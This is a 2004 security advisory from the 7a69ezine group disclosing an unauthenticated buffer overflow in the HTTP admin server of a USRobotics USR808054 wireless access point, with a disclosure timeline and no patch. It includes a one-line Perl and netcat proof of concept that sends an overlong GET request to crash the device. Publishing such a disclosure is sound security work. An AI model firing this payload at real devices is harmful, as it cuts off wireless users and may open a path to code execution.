-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------ 7a69ezine Advisories 7a69Adv#13 - ------------------------------------------------------------------ http://www.7a69ezine.org [02/08/2004] - ------------------------------------------------------------------ Title: USRobotics AP Wireless Denial of Service Author: Albert Puigsech Galicia - <ripe@xxxxxxxxxxxxx> Software: Embedded HTTP server Versions: 1.21h Remote: yes Exploit: yes Severity: High - ------------------------------------------------------------------ I. Introduction USRobotics is an important company that build lot of network devices, like modems, wireless cards or wireless access points. It builds also Robots (as you can see on "I, Robot" film). To get more information about this company you can visit the official website at http://www.usrobotics.com. II. Description The USR808054 wireless access point may be administered using HTTP protocol, so the firmwire includes a little HTTP server. The last version of this server has a critical buffer overflow that allow malicious users on the network to produce a denial of service or the execution of arbitrary code. III. Exploit A buffer overflow appears on HTTP version string in GET request. You can do the request without administrator password, so all users on the network allowed to connect to http port (all by default) can exploit this issue. This is a exploit code using perl: bash ~ $ perl -e '$a = "GET / " . "A"x250 . "\r\n\r\n" ; print $a' | nc ap 80 It crashes down the access point and disconnect all wireless users to the network. May be also posible (with knowledge about the architecture used by USRobotics) to exploit the vulnerability to execute arbitrary code and get total control to the device. IV. Patch Not yet. V. Timeline 19/07/2004 - Notified to spain_modemsupport@xxxxxxx - No reply VI. Extra data I have only tested this vulnerability on my USR808054, but other USR products may be also affected. - -- - ----------------------------------------------------------------------- Albert Puigsech Galicia http://www.7a69ezine.org/~apuigsech - ----------------------------------------------------------------------- Este e-mail puede contener información confidencial y/o privilegiada. Si el presente mensaje no va dirigido a su persona (o lo ha recibido por error) por favor, notifíquelo inmediatamente al emisor y destruya este e-mail. Cualquier divulgación, copia o distribución no autorizada del material contenido en este e-mail queda prohibida. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBDcyYiLW5f5WBvGcRAmQAAJ95CHJnT1AKiQ/mq6lXhJbGspIdNwCdEC+b agHJzXOTEyiGwq+8+y5zzOg= =6YBo -----END PGP SIGNATURE-----
